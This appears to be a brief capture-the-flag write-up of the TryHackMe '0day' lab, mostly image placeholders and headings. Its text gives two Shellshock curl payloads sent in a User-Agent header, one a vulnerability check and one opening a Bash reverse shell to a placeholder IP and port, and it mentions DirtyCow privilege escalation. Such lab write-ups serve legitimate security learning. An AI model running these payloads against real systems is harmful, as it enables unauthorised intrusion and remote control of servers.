rootšŸ’€senseicat:~#

Hack. Eat. Sleep. Repeat!!!


Project maintained by SENSEiXENUS Hosted on GitHub Pages — Theme by mattgraham

CTF: TRYHACKME

LAB: 0day


image


RECONNAISSANCE

image

image


Exploiting Shellshoch vulnerability

Payload-:curl -H "User-agent: () { :;}; echo; echo vulnerable" [path]

image

Payload-:curl -i -H "User-agent: () { :;}; /bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1"

image


PRIVESC with DirtyCow exploit

image

image

image

image


THANKS FOR READING!!!!….


REFERENCES: